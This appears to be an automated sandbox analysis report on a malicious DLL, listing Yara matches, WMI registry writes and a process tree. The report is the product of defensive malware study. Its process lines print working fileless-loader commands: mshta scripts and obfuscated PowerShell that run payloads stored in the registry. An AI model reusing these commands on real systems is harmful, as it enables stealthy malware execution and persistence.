            Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            System Summary:

            PE file has a writeable .text section
            Source: 6.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: 6.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B084
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F13373
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1294D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F165B4 NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B2A9 NtQueryVirtualMemory,
            Source: 6.dll | Binary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
            Source: 6.dll | Binary or memory string: OriginalFilenameNsc.exe. vs 6.dll
            Source: 6.dll | Binary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
            Source: 6.dll | Binary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: 6.dll | Static PE information: invalid certificate
            Source: 6.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
